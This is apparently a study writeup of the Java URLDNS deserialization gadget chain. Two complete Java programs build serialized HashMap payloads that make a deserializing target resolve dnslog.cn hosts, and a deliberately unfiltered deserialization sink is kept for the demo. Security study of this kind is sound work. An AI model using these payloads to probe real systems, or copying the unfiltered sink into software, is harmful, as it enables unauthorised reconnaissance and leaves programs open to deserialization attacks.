Reference: the ysoserial URLDNS payload that this writeup follows —
https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java
Chain structure

Gadget chain (how deserializing the HashMap reaches the DNS lookup):

- HashMap.readObject()
- HashMap.putVal()
- HashMap.hash()
- URL.hashCode()

URL.hashCode() only does work when its cached `hashCode` field is -1; it then delegates to the URLStreamHandler, whose getHostAddress() resolves the host name — that resolution is the DNS query seen on the log server. The chain executes no code: it is a probe that confirms an endpoint deserializes attacker-supplied bytes.
Original chain (mirrors ysoserial's approach: a silent URLStreamHandler plus a reflective reset of the cached hash)
package org.example.dnsurl;
import java.io.*;
import java.lang.reflect.Field;
import java.net.*;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;
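public class dd1h {

    /**
     * Fetches the body of {@code urli} over HTTP and returns it as text.
     * Not used by the payload generator; kept as a helper for reading a DNS-log page.
     *
     * @param urli absolute URL to fetch
     * @return the response body decoded as UTF-8
     * @throws IOException if the connection or the read fails
     */
    public static StringBuffer Httpget(String urli) throws IOException {
        URL url = new URL(urli);
        ByteArrayOutputStream body = new ByteArrayOutputStream();
        // try-with-resources closes the stream; the original never closed it.
        try (InputStream in = new BufferedInputStream(url.openStream())) {
            byte[] k = new byte[2048];
            int r;
            // Append only the bytes actually read: the original appended the whole
            // 2048-byte buffer on every pass (stale bytes, plus one extra pass at EOF).
            while ((r = in.read(k)) != -1) {
                body.write(k, 0, r);
            }
        }
        // Decode once so multi-byte sequences split across reads are not corrupted.
        return new StringBuffer(new String(body.toByteArray(), StandardCharsets.UTF_8));
    }

    /**
     * Writes {@code obj} with Java native serialization to {@code ser.bin} in the
     * working directory, overwriting any previous file.
     *
     * @param obj the object graph (here the HashMap payload) to serialize
     * @throws IOException if the file cannot be written
     */
    public static void serialize(Object obj) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            oos.writeObject(obj);
        }
    }

    /**
     * Reads one object from {@code Filename} with Java native deserialization.
     *
     * <p>Deliberately unfiltered: this is the vulnerable sink the gadget chain targets,
     * and deserializing the payload here resolves the embedded host name on this
     * machine. Never call this on untrusted data outside this demo; real code should
     * install an {@link ObjectInputFilter} or avoid native serialization entirely.
     *
     * @param Filename path of the serialized file
     * @return the deserialized object
     * @throws IOException            if the file cannot be read
     * @throws ClassNotFoundException if a class in the stream is not on the classpath
     */
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename))) {
            return ois.readObject();
        }
    }

    /**
     * Builds the URLDNS payload: a HashMap whose single key is a URL with its cached
     * hash reset, so the DNS lookup fires only when the map is deserialized.
     */
    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
        // Handler whose getHostAddress() returns null, so the URL.hashCode() call made by
        // HashMap.put() below hashes the host string instead of resolving it here.
        URLStreamHandler handler = new SilentURLStreamHandler();
        URL url = new URL(null, "http://4bpeqy.dnslog.cn", handler);
        Map<Object, Object> mp = new HashMap<>();
        // put() calls URL.hashCode(), which stores the result in URL.hashCode.
        mp.put(url, "y");
        // Reset the cached hash to -1 so HashMap.readObject() -> hash() -> URL.hashCode()
        // recomputes it on the deserializing side. URL.handler is transient, so the target
        // falls back to the default http handler, whose getHostAddress() does the real lookup.
        // JDK 16+: setAccessible on java.net.URL needs --add-opens java.base/java.net=ALL-UNNAMED.
        Field field = URL.class.getDeclaredField("hashCode");
        field.setAccessible(true);
        field.set(url, -1);
        serialize(mp);
        // unserialize("ser.bin"); // would trigger the DNS lookup locally
    }

    /**
     * Handler used only while generating the payload. Both overrides return null so
     * URL.hashCode() never resolves the host; it is not part of the URL's serialized
     * form, so the target uses the real http handler.
     */
    static class SilentURLStreamHandler extends URLStreamHandler {
        /** Never called: the URL is only used as a HashMap key. */
        @Override
        protected URLConnection openConnection(URL u) throws IOException {
            return null;
        }

        /** Returning null makes URLStreamHandler.hashCode() skip the DNS lookup. */
        @Override
        protected synchronized InetAddress getHostAddress(URL u) {
            return null;
        }
    }
}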
Avoiding the lookup while building the payload

A custom URLStreamHandler is used. HashMap.put() calls URL.hashCode() immediately, which would resolve the host on the attacker's machine and cache the result; this handler's getHostAddress() returns null, so the hash is computed from the host string instead. The handler is not part of the serialized form (URL.handler is transient), so the deserializing side falls back to the default http handler and performs the real lookup.
// Handler used only while generating the payload: both overrides return null so
// URL.hashCode() (called by HashMap.put) hashes the host string and never resolves it.
// It is not part of the URL's serialized form, so the target uses the real http handler.
static class SilentURLStreamHandler extends URLStreamHandler {
// Never called: the URL is only used as a HashMap key.
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
// Returning null makes URLStreamHandler.hashCode() skip the DNS lookup.
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
Finally the cached hash has to be reset to -1 through reflection, because put() has already populated URL.hashCode and URL.hashCode() returns the cached value without consulting the handler. On JDK 16 and later the setAccessible(true) call below needs `--add-opens java.base/java.net=ALL-UNNAMED`.
// Reset the hash cached by put() to -1 so URL.hashCode() recomputes it (and the
// default handler resolves the host) when the HashMap is deserialized.
// JDK 16+: requires --add-opens java.base/java.net=ALL-UNNAMED.
Class cls = url.getClass();
Field field = cls.getDeclaredField("hashCode");
field.setAccessible(true);
field.set(url,-1);
DIY variant (no custom handler)
package org.example.dnsurl;
import java.io.*;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;
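public class dd1h2 {

    /**
     * Fetches the body of {@code urli} over HTTP and returns it as text.
     * Not used by the payload generator; kept as a helper for reading a DNS-log page.
     *
     * @param urli absolute URL to fetch
     * @return the response body decoded as UTF-8
     * @throws IOException if the connection or the read fails
     */
    public static StringBuffer Httpget(String urli) throws IOException {
        URL url = new URL(urli);
        ByteArrayOutputStream body = new ByteArrayOutputStream();
        // try-with-resources closes the stream; the original never closed it.
        try (InputStream in = new BufferedInputStream(url.openStream())) {
            byte[] k = new byte[2048];
            int r;
            // Append only the bytes actually read: the original appended the whole
            // 2048-byte buffer on every pass (stale bytes, plus one extra pass at EOF).
            while ((r = in.read(k)) != -1) {
                body.write(k, 0, r);
            }
        }
        // Decode once so multi-byte sequences split across reads are not corrupted.
        return new StringBuffer(new String(body.toByteArray(), StandardCharsets.UTF_8));
    }

    /**
     * Writes {@code obj} with Java native serialization to {@code ser.bin} in the
     * working directory, overwriting any previous file.
     *
     * @param obj the object graph (here the HashMap payload) to serialize
     * @throws IOException if the file cannot be written
     */
    public static void serialize(Object obj) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            oos.writeObject(obj);
        }
    }

    /**
     * Reads one object from {@code Filename} with Java native deserialization.
     *
     * <p>Deliberately unfiltered: this is the vulnerable sink the gadget chain targets,
     * and deserializing the payload here resolves the embedded host name on this
     * machine. Never call this on untrusted data outside this demo; real code should
     * install an {@link ObjectInputFilter} or avoid native serialization entirely.
     *
     * @param Filename path of the serialized file
     * @return the deserialized object
     * @throws IOException            if the file cannot be read
     * @throws ClassNotFoundException if a class in the stream is not on the classpath
     */
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename))) {
            return ois.readObject();
        }
    }

    /**
     * Builds the URLDNS payload without a custom handler: the URL's cached hash is
     * pre-filled before put() and cleared again before serialization.
     */
    public static void main(String[] args) throws IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
        URL url = new URL("http://qi77bp.dnslog.cn");
        // URL.hashCode caches the hash; -1 means "not computed yet".
        // JDK 16+: setAccessible on java.net.URL needs --add-opens java.base/java.net=ALL-UNNAMED.
        Field field = URL.class.getDeclaredField("hashCode");
        field.setAccessible(true);
        // Pre-fill the cache so the URL.hashCode() call inside put() returns it
        // immediately instead of asking the default handler to resolve the host here.
        field.set(url, 1234);
        Map<Object, Object> mp = new HashMap<>();
        mp.put(url, "y");
        // Now clear it: on the target, HashMap.readObject() -> hash() -> URL.hashCode()
        // finds no cached value and resolves the host, producing the DNS-log entry.
        // (The field is already accessible; the original's second setAccessible was redundant.)
        field.set(url, -1);
        serialize(mp);
        // unserialize("ser.bin"); // would trigger the DNS lookup locally
    }
}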
Here the trigger is avoided purely by writing the cached hash twice: setting it to 1234 before put() makes URL.hashCode() return the cached value without calling the handler, and resetting it to -1 before serialization makes the deserializing side recompute it and resolve the host. The second setAccessible(true) call in the listing is redundant — the field is already accessible.